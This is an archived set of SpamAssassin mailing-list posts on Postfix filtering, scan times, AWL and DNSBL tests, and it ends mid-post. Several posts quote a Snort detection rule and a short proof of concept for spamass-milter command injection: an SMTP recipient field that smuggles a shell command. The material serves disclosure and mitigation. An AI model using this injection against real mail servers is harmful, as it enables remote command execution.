> Postfix can do this either via the milter interface OR the
> smtpd_proxy_filter
> 
> It's very easy.
> 
GROAN *** WE KNOW THAT!
Look at the title and read the post Ralf. The point is you need to use a
milter or proxy/policy daemon to do this with Postfix. The point being
'Why does it not natively support this functionality in the year 2010?' 

Answer: Because Weitse (AKA 'God') says so, so you all jump and say 'yes
sir, no sir, three bags full sir'.

So Ralf - author of 'The Postfix Book', can you please now tell me how
to get Postfix to reject mail before it accepts it and gives a 250 -
When Spamassassin tags it as spam? 

It's 2010, spam accounts for 9x% of mail so please share with me how you
can do this with just a minor config change with Postfix. The caveat you
can't use the milter, you can't use 'amavis-crashalot' and a 250 must
not be given if Spamassassin marks it as spam. I can't find it in your
book anywhere old chap..

I'm happy to stay on the Postfix 'merry-go-round' for an answer, or we
can just agree Postfix can't easily do this and move on and stop
flogging this dead horse :-)

Re: [Emerging-Sigs] SIG: SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt

2010-03-09 Thread Brian

On Tue, 2010-03-09 at 14:04 +0100, Yet Another Ninja wrote:
> to stay on the Postfix 'merry-go-round' for an answer, or we
> > can just agree Postfix can't easily do this and move on and stop
> > flogging this dead horse :-)
> 
> good idea -
> 
> Here, its totally off topic.
> 
> Move it to Postfix lists
> 
Better idea, just drop it! Postfix lacks features and it's a fair
statement.

There are enough arse lickers here without going to the Temple of Weiste
to visit the disciples without the socks.

Perhaps if people stopped kissing arse and grovelling so much Postfix
would have some sensible features - but that ain't gonna happen any time
soon.

Re: [Emerging-Sigs] SIG: SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt

2010-03-09 Thread Brian

On Tue, 2010-03-09 at 13:00 +, Robert Brooks wrote:
> Brian wrote:
> > On Tue, 2010-03-09 at 13:17 +0100, Ralf Hildebrandt wrote:
> >> * Brian :
> >>
> >>> In the year 2010 it is not unreasonable to expect the MTA that takes
> >>> responsibility for accepting a message to make reasonable checks about
> >>> the validity or content of that message. 
> >> Postfix can do this either via the milter interface OR the
> >> smtpd_proxy_filter
> >>
> >> It's very easy.
> >>
> 
> > So Ralf - author of 'The Postfix Book', can you please now tell me how
> > to get Postfix to reject mail before it accepts it and gives a 250 -
> > When Spamassassin tags it as spam? 
> 
> personally I use smtpd_proxy_filter to do EXACTLY this.

And without an external program.. ?

Clue 'YOU CAN'T'.

Re: Fwd: SIG: SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt

2010-03-09 Thread Brian

On Tue, 2010-03-09 at 02:36 -0700, LuKreme wrote:
> On 08-Mar-10 23:51, Brian wrote:
> > Yes, but that does not answer my question {and is once more Postfix
> > biased} AFAIK Postfix is totally unable to reject mail at SMTP time that
> > Spamassassin decides IS SPAM without the aid of a milter or policy
> > deamon of some kind. Unless you know different?
> 
> You don't let messages even GET to SA until they pass sane checks (like 
> reject_non_fqdn_sender and reject_non_fqdn_recipient).

Which spam happily passes, hence the need for Spamassassin to do content
inspection - unless you are telling me Postfix can offer the same level
of content inspection as  Spamassassin? (Clue: stock answer - 'Postfix
is an MTA, it does not do..)
> 
> > Natively It can happily do it after accepting the mail (hint - a bit
> > late then...) with an after queue filter, but this is prone to the
> > phenomenon that is 'Postscatter' -sending the message back to the
> > (often) forged sender.
> 
> You never send back a spam that you accepted. You reject it, deliver it, 
> or discard it. *Never* bounce backscatter.
Which Postfix *CANNOT* do with Spamassassin *UNLESS* you use the milter.
Unless you know otherwise...
> 
> > Postfix, much that I love it, has some gaping holes in it's feature set.
> 
> No, it really doesn't.
Yes it does, see above. Another example header and body checks that
don't support any kind of whitelisting. No native support for DKIM, no
sensible native content filters.
> 
> > It really is an MTA for the 1990's. The need to bolt in an Sendmail
> > Milter to get it to reject Spamassassin tagged mail at the SMTP stage is
> > a glaring example IHMO - But all this is very much OT.
> 
> If you want milters, postfix has supported them for years. They are not 
> necessary in this case.
OK Lukreme. Tell me how you get Postfix to reject spam on content AT
SMTP TIME - NOT AFTER ACCEPTING IT when Spamassassin decides that it is
SPAM. Such a case where the incoming mail meets all other SMTP criteria
(has PTR, PTR rrdns matches, not listed on any RBL, is to a valid
recipient). Let's say, for the sake of simplicity, it matches a a
Spamassassin body based metarule. How do you do this natively in Postfix
without the use of a Milter or Policy Daemon of some kind? I'd really
like to know.

Re: Fwd: [Emerging-Sigs] SIG: SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt

2010-03-08 Thread Brian

On Mon, 2010-03-08 at 20:44 +, Ned Slider wrote:
> Brian wrote:
> >> That's Postfix 2.3.3 on RHEL5 BTW :-)
> >>
> >> $ rpm -q postfix
> >> postfix-2.3.3-2.1.el5_2.x86_64
> >>
> > Tell me Ned, how do you get Postfix (2.3.3 on RHEL5) to reject at SMTP
> > time without using a the milter or something hideous like
> > Amavis-crashalot? Perhaps if they added some features to that old
> > dinosaur it would become a bit more useful as an MTA :-)
> > 
> > 
> 
> See this guide I've written:
> 
> http://wiki.centos.org/HowTos/postfix_restrictions
> 
> Specifically,
> 
> # /etc/postfix/main.cf
> # Recipient restrictions:
> smtpd_recipient_restrictions =
> reject_unknown_recipient_domain
> 
Yes, but that does not answer my question {and is once more Postfix
biased} AFAIK Postfix is totally unable to reject mail at SMTP time that
Spamassassin decides IS SPAM without the aid of a milter or policy
deamon of some kind. Unless you know different? 

Natively It can happily do it after accepting the mail (hint - a bit
late then...) with an after queue filter, but this is prone to the
phenomenon that is 'Postscatter' -sending the message back to the
(often) forged sender. This is kind of ironic given how the Postfix
Posse bang on about 'not accepting' mail of criteria 'x'.

Postfix, much that I love it, has some gaping holes in it's feature set.
It really is an MTA for the 1990's. The need to bolt in an Sendmail
Milter to get it to reject Spamassassin tagged mail at the SMTP stage is
a glaring example IHMO - But all this is very much OT.

Re: Fwd: [Emerging-Sigs] SIG: SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt

2010-03-08 Thread Brian

> That's Postfix 2.3.3 on RHEL5 BTW :-)
> 
> $ rpm -q postfix
> postfix-2.3.3-2.1.el5_2.x86_64
> 
Tell me Ned, how do you get Postfix (2.3.3 on RHEL5) to reject at SMTP
time without using a the milter or something hideous like
Amavis-crashalot? Perhaps if they added some features to that old
dinosaur it would become a bit more useful as an MTA :-)

Re: Fwd: [Emerging-Sigs] SIG: SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt

2010-03-08 Thread Brian

On Mon, 2010-03-08 at 20:16 +, Ned Slider wrote:
> Brian wrote:
> > On Mon, 2010-03-08 at 14:08 -0500, Michael Scheidell wrote:
> >> just a heads up:  I don't know if there is a problem with SA milter, but 
> >> there is a snort signature for it now.
> >>
> >>
> >>  Original Message 
> >> Subject:   [Emerging-Sigs] SIG: SpamAssassin Milter Plugin Remote 
> >> Arbitrary Command Injection Attempt
> >> Date:  Mon, 8 Mar 2010 13:03:52 +
> >> From:  Kevin Ross 
> >> To:emerging-s...@emergingthreats.net 
> >> , Matt Jonkman 
> >>
> >>
> >>
> >> alert tcp $EXTERNAL_NET any -> $HOME_NET 25 (msg:"ET EXPLOIT Possible 
> >> SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt"; 
> >> flow:established,to_server; content:"to|3A|"; nocase; 
> >> content:"root+|3A|\"|7C|"; nocase; within:15; classtype:attempted-user; 
> >> reference:url,www.securityfocus.com/bid/38578 
> >> <http://www.securityfocus.com/bid/38578>; 
> >> reference:url,seclists.org/fulldisclosure/2010/Mar/140 
> >> <http://seclists.org/fulldisclosure/2010/Mar/140>; sid:1324412; rev:1;)
> >>
> >> Kev
> >>
> > 
> > The key is this:
> > 
> > "If spamass-milter is run with the expand flag (-x option) it runs a
> > popen() including the attacker supplied 
> > recipient (RCPT TO)."
> > 
> > POC IS
> > 
> > $ nc localhost 25
> > 220 ownthabox ESMTP Postfix (Ubuntu)
> > mail from: me () me com
> > 250 2.1.0 Ok
> > rcpt to: root+:"|touch /tmp/foo"
> > 250 2.1.5 Ok
> > 
> > $ ls -la /tmp/foo
> > -rw-r--r-- 1 root root 0 2010-03-07 19:46 /tmp/foo
> > 
> > 
> 
> Easily mitigated, you shouldn't be accepting mail to non-FQDN addresses
> 
> mail from: n...@example.com
> 250 2.1.0 Ok
> rcpt to: root+:"|touch /tmp/foo"
> 504 5.5.2 : Recipient address rejected: need 
> fully-qualified address
> quit
> 221 2.0.0 Bye
> Connection closed by foreign host.
> 
That's a Microsoft kind of answer if you don't mind me saying. Correct
me if I'm wrong, but MILTER is (pretty much) native to Sendmail and is a
bolt-on after thought for Postfix ;-)

It is easily mitigated by *not* running it with '-x' {Happy then
**WITHOUT** Postfix}

Re: Fwd: [Emerging-Sigs] SIG: SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt

2010-03-08 Thread Brian

On Mon, 2010-03-08 at 14:08 -0500, Michael Scheidell wrote:
> just a heads up:  I don't know if there is a problem with SA milter, but 
> there is a snort signature for it now.
> 
> 
>  Original Message 
> Subject:  [Emerging-Sigs] SIG: SpamAssassin Milter Plugin Remote 
> Arbitrary Command Injection Attempt
> Date: Mon, 8 Mar 2010 13:03:52 +
> From: Kevin Ross 
> To:   emerging-s...@emergingthreats.net 
> , Matt Jonkman 
> 
> 
> 
> alert tcp $EXTERNAL_NET any -> $HOME_NET 25 (msg:"ET EXPLOIT Possible 
> SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt"; 
> flow:established,to_server; content:"to|3A|"; nocase; 
> content:"root+|3A|\"|7C|"; nocase; within:15; classtype:attempted-user; 
> reference:url,www.securityfocus.com/bid/38578 
> ; 
> reference:url,seclists.org/fulldisclosure/2010/Mar/140 
> ; sid:1324412; rev:1;)
> 
> Kev
> 

The key is this:

"If spamass-milter is run with the expand flag (-x option) it runs a
popen() including the attacker supplied 
recipient (RCPT TO)."

POC IS

$ nc localhost 25
220 ownthabox ESMTP Postfix (Ubuntu)
mail from: me () me com
250 2.1.0 Ok
rcpt to: root+:"|touch /tmp/foo"
250 2.1.5 Ok

$ ls -la /tmp/foo
-rw-r--r-- 1 root root 0 2010-03-07 19:46 /tmp/foo

Re: Zen.spamhous.org score for spam assassin...

2010-03-08 Thread Brian

On Mon, 2010-03-08 at 12:41 +, Mike Cardwell wrote:
> On 08/03/2010 12:34, Brian wrote:
> 
> > Is zen.spamhous.org new? Personally I'd check your spelling ;-)
> 
> m...@haven:~$ host 1.0.0.127.zen.spamhous.org
> 1.0.0.127.zen.spamhous.org  A   208.73.210.27
> m...@haven:~$ host 1.2.3.4.zen.spamhous.org
> 1.2.3.4.zen.spamhous.orgA   208.73.210.27
> m...@haven:~$
> 
> Wonder how many people that has tripped up in its time.
I wonder if Claus at UCEProtect registered that? Two things make me
wonder. First, he is said to be a cyber-squatter, but the clincher for
me is using 'zen.spamhous.org' results in a positive return and high
false positive rate 
}}} GRIN

Re: Zen.spamhous.org score for spam assassin...

2010-03-08 Thread Brian

Is zen.spamhous.org new? Personally I'd check your spelling ;-)

Re: How to find where email server has been blacklisted

2010-03-08 Thread Brian

On Mon, 2010-03-08 at 10:51 +0100, Mikael Syska wrote:
> Hi,
> 
> Then something is broken at your end ...
> 
> I see 4 icons ... timeout, listed, non-listed  and offline.
> 
> Or am I missing your point here ?

*HINT* Are you colour blind or normal sighted?

RE: which SA database to use

2010-01-08 Thread Brian Bebeau

 

> I have qmail running with the
> 
>  :allow,QMAILQUEUE="/usr/bin/qmail-spamc"
> 
> in /etc/tcp.smtp
> 
> I have some hams/spams that I want to run sa-learn against, but I
> can't figure out which database it is qmail filters through. Is it the
> db of the user "spamd", "root" or some qmail user account?
> Anyone running qmail with SA that could provide me with some insight
> that would be great.

If you're using the QMAILQUEUE env var, you're generally overriding the 
qmail-queue program, which usually is owned by user "qmailq". You can check
who owns /var/qmail/bin/qmail-queue (or wherever qmail-queue is) to see.

Re: giftcardsurveys.us.com

2009-08-13 Thread Brian Godette

Johnson, S wrote:
> I’ve done really good with blocking spam up until this one…
> 
> It looks like a “legitimate” e-mailer from both the system perspective
> and the system perspective.
> 
> When I look at my logs, the servers are reporting their domains
> correctly so their mailserver looks ok when attacking to my server. 
> Each email seems to be coming from numerous different servers so I can’t
> block on server address…
> 
> They say don’t do “spamming” but the area in the email that contains the
> link to remove yourself/unsubscribe is an image so you can’t click on
> it, instead you have to type it in by hand.  I normally don’t proceed
> down that path but I decided to try it anyway.  When I put in the email
> address of the user that was being sent these survey offers for gift
> cards I got a message stating please allow 10 days for removal which
> makes me think they are not legit.
> 
> The question is… Since everything is configured on their servers ok and
> the messages don’t contain words I can really create a rule on..  It’s
> not just home depot, it’s KFC, Macy’s and numerous other retailers. 
> Anyone have any ideas on how to block these?  The poor user is getting
> about 10 / day.
> 
> Thanks,
> 
>   Scott

Welcome to snowshoe spam.

The only effective defense I've seen against this is to have a greylist
with more than an hour temp fail time so each new spam run has time to
hopefully show up in DCC and possibly RAZOR/Pyzor/Spamcop/URIBL.

The content really can't be matched against since the URIs are old
enough to not be in something like DOB, haven't been used before so
aren't in the URIBLs, and look like real rebate/coupon mail so
BAYES/phrase matching is useless unless you want to nuke or manually
whitelist the legit stuff. The websites are of course a CC scam/PI phish.

You can block the servers, a class C or whois allocation at a time, if
you're willing to deal with the occasional "why am I not getting mail
from ABC who's decided to host with sleazy hosting XYZ" if the space
ever gets reassigned.

Re: Server overload, queuing for SA possible?

2009-03-25 Thread Brian J. Murrell

On Wed, 2009-03-25 at 15:01 -0400, Michael Scheidell wrote:
>  
> Match your MTA processes to the spamd children.  Your MTA will send 4xx
> 'busy now, come back to play later' message.  Let the sending MTA queue it
> back up (or zombies will just go away)

I don't really see that as a socially responsible action.  If my
mailserver was completely loaded to the point of not even being able to
queue a message, I'd buy pushing back on the sender with a 4xx, but the
reality is that while I may have maxed out my spamd children, I can
likely still receive and queue mail locally.

The queueing up of mail to spamd really belongs on the local server, and
should not become a burden on sending MTAs.

I'm kinda gathering that this is not possible within spamassassin
itself.  Probably in fact it is for at least some MTAs but how to
achieve it becomes MTA specific and OT here.

b.

signature.asc
Description: This is a digitally signed message part

RE: Server overload, queuing for SA possible?

2009-03-24 Thread Brian J. Murrell

On Tue, 2009-03-24 at 08:10 -0500, Bowie Bailey wrote:
> 
> Your assessment sounds right to me.  I would make two suggestions.
> 
> 1) Memory is cheap these days.  Add some more RAM.

That's a mitigation strategy, yes, but it doesn't really answer OP's
question about how to make spamd stop trying to allocate new incoming
spams to try to process them all at the time they come in and instead
put them into a queue, in a effort to try to "even" the load out.

> 2) Reduce the maximum children setting so that the system doesn't start
> swapping.  This will cause SA to scan faster and should result in fewer
> messages slipping through while SA is busy.

But it also means if the incoming load temporarily overruns the
available children currently available, then the excess doesn't get
spamd treatment.  Or does it?

If I have 5 spamd children available and (just to torture it) I fire off
50 spamc processes, what happens?

b.

signature.asc
Description: This is a digitally signed message part

Re: false positive on X-Mailer: Microsoft Outlook

2009-02-22 Thread Brian J. Murrell

On Sat, 21 Feb 2009 16:51:29 +0100, Karsten Bräckelmann wrote:
>  
> Sounds like bug 5962 and it's friends.
>   https://issues.apache.org/SpamAssassin/show_bug.cgi?id=5962

Yeah, I read that one.  The fix that was pushed for that bug however does 
not include the __HOTMAIL_BAYDAV_MSGID pattern as an exclusion for 
__FORGED_OUTLOOK_DOLLARS.

> Hmm, that fix also landed in the 3.2 branch, and even has been pushed
> out to the updates. So it isn't that one?

No.  That fix still does not use the __HOTMAIL_BAYDAV_MSGID pattern to 
validate the __FORGED_OUTLOOK_DOLLARS test.

> Brian, can you please check bugzilla for similar reports [1],

That was a pretty vague search, hence all the hits.

> closed or
> still open, and file a new bug, if none of them is your issue?

Yeah, I don't see anything better than bug 5692.  So file a new bug.  
~sigh~  Yet another bugzilla account I have to create/manage.  I just get 
so tired of every website wanting me to register/log-in.  No openid 
support either.

Oh.  Seems there is already an account with my e-mail id.  I guess I 
already have one, but lord knows what the password is.  So now for the 
password recovery rigmarole.  Did I already express my displeasure with 
having to manage so many login accounts?  I guess that's what openid is 
supposed to deal with.  The plethora of accounts is out of hand now.

Anyway, when I get the password change token, I will file a new bug.  
Sorry for the whine.

Cheers,
b.

false positive on X-Mailer: Microsoft Outlook

2009-02-20 Thread Brian J. Murrell

Hi

I have a message in hand that is triggering false positives based on the 
ratware rules in 3.2.4.

The specific headers are:

Message-ID: 
X-Mailer: Microsoft Outlook, Build 10.0.6838

Specifically, it seems that the X-Mailer header matches 
__OUTLOOK_DOLLARS_MUA, and the Message-ID matches __HOTMAIL_BAYDAV_MSGID

The problem is that __OUTLOOK_DOLLARS_MUA is included in 
__FORGED_OUTLOOK_DOLLARS without an exception for __HOTMAIL_BAYDAV_MSGID 
so __FORGED_OUTLOOK_DOLLARS causes a hit on FORGED_MUA_OUTLOOK.

It seems to me, given this valid, non spam, non-ratware originating 
message, that __FORGED_OUTLOOK_DOLLARS needs to include an "&& !
__HOTMAIL_BAYDAV_MSGID" in the exception list.

Thots?

b.

P.S. I do see that trunk is handling this combination of headers in a 
fairly different manner.  But that doesn't change the fact that this MUA 
is causing false positives on 3.2, even with the latest (sa-
update_3.2_20081231172858 according to SVN) 3.2 udpate.

Re: excessive scan time

2009-01-22 Thread Brian J. Murrell

On Thu, 22 Jan 2009 12:37:09 +, Justin Mason wrote:

> you should definitely investigate ways to avoid doing NFS reads/writes
> of the bayes files -- that is extremely I/O intensive, and NFS deals
> with it very badly.

OK.  Noted.  Maybe I will push the bayes database into MySQL as 
previously suggested.

Thanx!

b.

Re: excessive scan time

2009-01-22 Thread Brian J. Murrell

On Thu, 22 Jan 2009 13:27:57 +0100, Jonas Eckerman wrote:
> 
> If you're not allready using a SQL database for bayes and AWL I'd
> suggest you do that.

Those two I might be willing to consider, however...

> I'd also suggest using SQL for user preferences.

The user interface (i.e. editing a file) for user preferences is a 
different story.  Now users need to know how to edit SQL records, or I 
need to install a web interface for that.  The ROI here for that is just 
not high enough.

> With bayes, AWL and user prefs in a SQL database that problem ought to
> be avoided. (Maybe there's more than those that should be moved from
> ~/.spamassassin though).

Yeah.  I tend to doubt those are the real culprits.  I think I have 
identified a backup process on the same server that does the NFS and mail 
as being quite expensive in both disk an memory and it's probably what is 
contending with spamd processes for resources.

b.

profile the various tests being done

2009-01-21 Thread Brian J. Murrell

I'm trying to figure out why in some cases, spamd is taking in excess of 
1200s to process messages.  Is there any way to profile (i.e. time, or 
timestamp) each of the tests that spamd is doing so I can see where the 
longest ones are?

Even enabling the kind of debug that "spamassassin -D" produces, along 
with timestamps for each line of debug would be useful.

I've tried to use -D with spamd but I don't see any debug being logged 
anywhere (i.e. not in /var/log/mail.info along with the rest of spamd's 
log output).

Cheers,
b.

Can't locate object method "new" via package "Net::DNS::RR::TXT"

2009-01-20 Thread Brian J. Murrell

I seem to be getting a lot of these in the last 36h:


12:02:26 spamd Can't locate object method "new" via package "Net::DNS::RR::TXT" 
at /usr/lib/perl5/Net/DNS/RR.pm line 305.
12:02:26 spamd caught at /usr/share/perl5/Mail/SpamAssassin/DnsResolver.pm line 
419

Any ideas why?

b.

Re: excessive scan time

2009-01-19 Thread Brian J. Murrell

On Mon, 19 Jan 2009 16:47:24 +0100, Matus UHLAR - fantomas wrote:
>  
> When did you sa-update for last time?

Ubuntu appears to install a cron.daily cron job which does this amongst 
other things.

> How many processes are you running
> in parallel?

I have a pretty low volume system but I did just up it from 5 to 8 
yesterday.

> Aren't you running out of memory?

No.

>> a) determine why the scan time is so long, after the fact (i.e. I could
>>try to run the same spam through a "spamassassin -D [-t]" but there
>>is no guarantee that whatever took so long the first time through
>>will again take so long)?
> 
> try running spamasssin with -L option

How will -L (local tests only) help me determine which remote tests are 
taking so long?

>> b) reduce some timeouts of some particular tests so that the total test
>>time does not exceed a reasonable threshold?
> 
> razor,pyzor,dcc,spf,dkim,rbl have their timeouts (*_timeout), see their
> (or SpamAssassin) docs.

Indeed.  "dpkg -L spamassassin | xargs grep _timeout" shows some very 
interesting results.

Now that I think about it, I wonder if I am barking up the wrong tree.  
One thing worth noting is that I have spamassassin using ~/.spamassassin 
here and people's home dirs can be (i.e. NFS) mounted from remote 
machines (i.e. their primary workstations), which do occasionally get 
shut down.  I wonder what happens in the MTA->SA->local delivery process 
chain when ~/.spamassassin is unavailable, or worse, on a stale mount.

Is there a reasonable timeout built in to trying to read from that dir?

Thots?

b.

excessive scan time

2009-01-19 Thread Brian J. Murrell

I'm running 3.2.4(-1ubuntu1) of spamassassin here and have been noticing 
some excessive scan times.  i.e.:

Jan 18 19:07:28 linux spamd[30216]: spamd: result: Y 14 - 
AWL,BAYES_99,DCC_CHECK,DIGEST_MULTIPLE,HTML_IMAGE_ONLY_20,HTML_IMAGE_RATIO_06,HTML_MESSAGE,HTML_SHORT_LINK_IMG_3,MIME_HTML_ONLY,RAZOR2_CF_RANGE_51_100,RAZOR2_CF_RANGE_E8_51_100,RAZOR2_CHECK,RDNS_NONE,TVD_APPROVED,URIBL_BLACK
 
scantime=604.3,size=3325,user=brian,uid=1001,required_score=5.5,rhost=localhost,raddr=127.0.0.1,rport=49135,mid=<20090118234025.2fa951cc7...@66v.uwp30.udelmarva.com>,bayes=1.00,autolearn=spam

The result of this (604 second) scan time is that the MTA ends up giving 
up waiting after 600 seconds and the scan result is essentially wasted.  
No doubt some kind of "remote" test is taking an excessive amount of time.

How can I:

a) determine why the scan time is so long, after the fact (i.e. I could
   try to run the same spam through a "spamassassin -D [-t]" but there is
   no guarantee that whatever took so long the first time through will
   again take so long)?
b) reduce some timeouts of some particular tests so that the total test
   time does not exceed a reasonable threshold?

Thanx,
b.

Re: skew the AWL on spam report

2008-12-04 Thread Brian J. Murrell

On Thu, 2008-12-04 at 22:38 -0500, Matt Kettler wrote:
> 

To follow-up on this suggestion...

> That said, why add code to sa-learn when spamassassin can already do
> something even more complete. Try feeding the message "spamassassin -r
> --add-to-blacklist".

It seems (looking at -D output) that spamassassin won't do both of those
in the same invocation.  If I put both the "-r" and "--add-to-blacklist"
options on the command-line, it only does the latter.  If I leave off
the latter command line, it goes ahead and reports the spams to the
various digest databases.

b.

Re: skew the AWL on spam report

2008-12-04 Thread Brian J. Murrell

On Thu, 2008-12-04 at 22:38 -0500, Matt Kettler wrote:
>
> That said, why add code to sa-learn when spamassassin can already do
> something even more complete. Try feeding the message "spamassassin -r
> --add-to-blacklist".

Ahhh.  I was mistakenly thinking that sa-learn == [ update-bayes
database + what spamassassin -r does ].

> Provided you haven't disabled bayes_learn_during_report, the -r will
> cause bayes learning as spam. As a bonus it will also report the message
> to spamcop and razor, pyzor, etc if you have them installed.

Sweet.  Thanx!  Your solution is perfectly reasonable.

b.

Re: skew the AWL on spam report

2008-12-04 Thread Brian J. Murrell

On Thu, 2008-12-04 at 18:35 -0500, Matt Kettler wrote:
> 
> ie: you
> can't tell sa-learn a message is spam and have it apply that information
> in any way to the AWL.  I guess that's really what my point was, and I
> expressed it poorly.

I guess as the OP of this thread, my point was that why shouldn't
sa-learn skew up the (existing) scores in the AWL when it is given a
spam to learn?  IOW, if an entry in the AWL doesn't already exist, don't
add one but if there is a matching entry, skew it's scoring to ensure
that the next time it's used for this sender, it adds to the spamminess
score, not subtracts from it.

I have come to understand via this thread that the
"--add-addr-to-blacklist" (or is it more correctly
"--add-to-blacklist"?) argument effectively does that, adding a "fake"
entry to the AWL representing a spam scored at 100 points.

My proposal would be to roll up this "--add-to-blacklist" spamassassin
argument into sa-learn --ham with the exception of only modifying an
existing entry, not creating new ones.

b.

skew the AWL on spam report

2008-12-02 Thread Brian J. Murrell

If I get a spam and I need to have SA learn that it's spam with
sa-learn, wouldn't it be useful to also skew the AWL for that sender so
that future uses of the AWL for that spammer will push the overall spam
score up?

Thots?

b.

RE: why is SA testing my server in DNSBLs?

2008-12-02 Thread Brian J. Murrell

On Tue, 2008-12-02 at 17:17 -0500, Rosenbaum, Larry M. wrote:
> 
> The checks it's doing below are all RHBL checks, so it's probably testing the 
> Return-Path:.

Indeed, this was the case.  What's even better is that is only for the
case where I test out of my mailbox as that Return-Path: is only added
(in replacement) by local delivery.  Actual production testing of
incoming mail would have used the Return-Path: added by my receiving
MTA.

Thanx for the info!

b.

why is SA testing my server in DNSBLs?

2008-12-02 Thread Brian J. Murrell

Hi All,

I was doing a bit of "spamassassin -D" testing with SA 3.2.4 and noticed
that it's running my own mail server name through various DNSBL tests.  

Here are the headers of the particular message I am testing:

>From [EMAIL PROTECTED] Tue Dec  2 05:24:59 2008
Return-Path: <[EMAIL PROTECTED]>
X-Sieve: CMU Sieve 2.2
X-Original-To: [EMAIL PROTECTED]
Delivered-To: [EMAIL PROTECTED]
Received: from johnstonsz.net (unknown [64.86.206.149]) by
 linux.interlinx.bc.ca (Postfix) with ESMTP id E0F4A86FF for
 <[EMAIL PROTECTED]>; Tue,  2 Dec 2008
 05:24:55 -0500 (EST)
Received: by johnstonsz.net (Postfix) with SMTP id 1C89413122ED for
 <[EMAIL PROTECTED]>; Tue,  2 Dec 2008
 05:25:54 -0500 (EST)
Subject: Shop On us - 1000 Wal-Mart GiftCard!
From: SamplePacks<[EMAIL PROTECTED]>
Reply-to: <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
X-Priority: 5
X-Mailer: AlphaPlus 
Content-Type: text/html; charset=us-ascii;
Content-Disposition: inline
Message-Id: <[EMAIL PROTECTED]>
Date: Tue,  2 Dec 2008 05:25:54 -0500 (EST)
X-Evolution-Source: imap://[EMAIL PROTECTED]/
Content-Transfer-Encoding: 8bit
Mime-Version: 1.0

Here's the relevant bits of the SA debug:

[29986] dbg: received-header: parsed as [ ip=64.86.206.149 rdns= 
helo=johnstonsz.net by=linux.interlinx.bc.ca ident= envfrom= intl=0 
id=E0F4A86FF auth= msa=0 ]
[29986] dbg: received-header: relay 64.86.206.149 trusted? no internal? no msa? 
no
[29986] dbg: metadata: X-Spam-Relays-Trusted: 
[29986] dbg: metadata: X-Spam-Relays-Untrusted: [ ip=64.86.206.149 rdns= 
helo=johnstonsz.net by=linux.interlinx.bc.ca ident= envfrom= intl=0 
id=E0F4A86FF auth= msa=0 ]
[29986] dbg: metadata: X-Spam-Relays-Internal: 
[29986] dbg: metadata: X-Spam-Relays-External: [ ip=64.86.206.149 rdns= 
helo=johnstonsz.net by=linux.interlinx.bc.ca ident= envfrom= intl=0 
id=E0F4A86FF auth= msa=0 ]

So it seems that the "by linux.interlinx.bc.ca" specification of what
should be the first "trusted" Received: header is being used later in
DNSBL tests:

[29986] dbg: dns: launching DNS A query for 
linux.interlinx.bc.ca.rhsbl.ahbl.org. in background
[29986] dbg: async: starting: DNSBL-A, 
dns:A:linux.interlinx.bc.ca.rhsbl.ahbl.org. (timeout 15.0s, min 3.0s)
[29986] dbg: dns: checking A and MX for host linux.interlinx.bc.ca
[29986] dbg: dns: launching DNS A query for linux.interlinx.bc.ca in background
[29986] dbg: async: starting: NO_DNS_FOR_FROM, DNSBL-A, 
dns:A:linux.interlinx.bc.ca (timeout 15.0s, min 3.0s)
[29986] dbg: dns: launching DNS MX query for linux.interlinx.bc.ca in background
[29986] dbg: async: starting: NO_DNS_FOR_FROM, DNSBL-MX, 
dns:MX:linux.interlinx.bc.ca (timeout 15.0s, min 3.0s)
...
[29986] dbg: dns: launching DNS A query for 
linux.interlinx.bc.ca.bl.open-whois.org. in background
[29986] dbg: async: starting: DNSBL-A, 
dns:A:linux.interlinx.bc.ca.bl.open-whois.org. (timeout 15.0s, min 3.0s)
...
[29986] dbg: dns: launching DNS A query for 
linux.interlinx.bc.ca.fulldom.rfc-ignorant.org. in background
[29986] dbg: async: starting: DNSBL-A, 
dns:A:linux.interlinx.bc.ca.fulldom.rfc-ignorant.org. (timeout 15.0s, min 3.0s)

I do (believe) I understand trusted_networks and internal_networks and
have them configured for my local installation, but given that Recieved:
header (which should be a trusted), how is SA to know that it's on the
internal or trusted networks list when it doesn't have the IP address of
the relay in it.  Maybe that is the crux of the problem.

My MTA is Postfix 2.5.1 FWIW.

Any ideas?

b.


signature.asc
Description: This is a digitally signed message part

Re: RCVD_ILLEGAL_IP question(s)

2008-08-13 Thread Brian Martinez


Folks,

Thanks for your responses thus-far.  It seems that my head is floating in 
the clouds today and I appear to be dreaming half of this situation.  A 
couple of months ago, as I said, our network admin pointed out this 
problem to me.  I can no longer find the email he sent me where he stated 
this and that and the other, nor can I even find my response back to him. 
I remember doing a bunch of "homework" on the issue when I became aware of 
the issue and it has been awhile since I looked upon it again.


Everything I described previous was from memory.  I swear to you all I was 
able to ping one of those IP addresses, and I even remember looking at 
ARIN.  Well it appears that I am dead wrong!  Heh!  I really have no idea 
how I've misinformed myself so badly.  Anyway, I am contacting Consumers 
Energy about the matter now, their postmaster too.


I appreciate all the input, but I guess we can consider this matter 
closed.


Move along, nothing to see here...  ;)
./brm

RCVD_ILLEGAL_IP question(s)

2008-08-13 Thread Brian Martinez


Howdy folks,

I'm experiencing a problem with some people (myself included) who are not 
properly receiving their Consumer's Energy bills.  Rather, the bills are 
being marked as spam and sent into their SPAM folders.  One of the two 
things being marked by the Spam-Report are RCVD_ILLEGAL_IP


I found the function that does the checking for this information in the 
Mail-Spamassassin (or perl-spamassassin-3.2.1-1) package.  We have this 
installed out of RPMs for OpenSuSE 10.2 (both x86 and amd64)


Here is the function:

sub check_for_illegal_ip {
  my ($self, $pms) = @_;

  foreach my $rcvd ( @{$pms->{relays_untrusted}} ) {
# (note this might miss some hits if the Received.pm skips any invalid 
IPs)

foreach my $check ( $rcvd->{ip}, $rcvd->{by} ) {
  return 1 if ($check =~ /^

(?:[01257]|(?!127.0.0.)127|22[3-9]|2[3-9]\d|[12]\d{3,}|[3-9]\d\d+)\.\d+\.\d+\.\d+
$/x);
}
  }
  return 0;
}

I'm having a hard time understanding the regex myself.  Our network admin 
is actually the person who brought the issue to my attention, I didn't 
